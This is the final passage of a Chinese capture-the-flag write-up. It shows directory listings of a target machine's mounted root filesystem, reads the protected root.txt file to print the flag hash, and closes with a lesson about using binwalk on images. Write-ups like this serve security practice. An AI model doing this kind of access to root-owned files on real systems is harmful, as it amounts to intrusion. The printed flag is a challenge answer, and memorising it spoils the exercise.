drwxr-xr-x 3 root root 4.0K Sep 3 2021 opt
dr-xr-xr-x 136 root root 0 Dec 9 04:47 proc
drwx------ 5 root root 4.0K Sep 4 2021 root
drwxr-xr-x 29 root root 980 Dec 9 08:55 run
drwxr-xr-x 2 root root 12.0K Sep 4 2021 sbin
drwxr-xr-x 2 root root 4.0K Sep 3 2021 snap
drwxr-xr-x 2 root root 4.0K Aug 6 2020 srv
-rw------- 1 root root 1.8G Sep 3 2021 swap.img
dr-xr-xr-x 13 root root 0 Dec 9 04:47 sys
drwxrwxrwt 10 root root 4.0K Dec 9 08:45 tmp
drwxr-xr-x 11 root root 4.0K Sep 4 2021 usr
drwxr-xr-x 14 root root 4.0K Sep 3 2021 var
lrwxrwxrwx 1 root root 31 Sep 3 2021 vmlinuz -> boot/vmlinuz-4.15.0-154-generic
lrwxrwxrwx 1 root root 31 Sep 3 2021 vmlinuz.old -> boot/vmlinuz-4.15.0-154-generic
/mnt/root # cd root
/mnt/root/root # ls -alh
total 48K
drwx------ 5 root root 4.0K Sep 4 2021 .
drwxr-xr-x 24 root root 4.0K Sep 3 2021 ..
lrwxrwxrwx 1 root root 9 Sep 3 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.0K Apr 9 2018 .bashrc
drwx------ 3 root root 4.0K Sep 3 2021 .cache
drwxr-xr-x 3 root root 4.0K Sep 3 2021 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
lrwxrwxrwx 1 root root 9 Sep 3 2021 .python_history -> /dev/null
-rw-r--r-- 1 root root 66 Sep 3 2021 .selected_editor
drwx------ 2 root root 4.0K Sep 3 2021 .ssh
-rw------- 1 root root 8.7K Sep 4 2021 .viminfo
-rw------- 1 root root 33 Sep 3 2021 root.txt
/mnt/root/root # cat root.txt
f0b98d4387ff6da77317e582da98bf31
/mnt/root/root #
至此拿到root flag
经验教训
- 对于图片的分析工具集中不能忘了binwalk工具
STRIVE FOR PROGRESS,NOT FOR PERFECTION
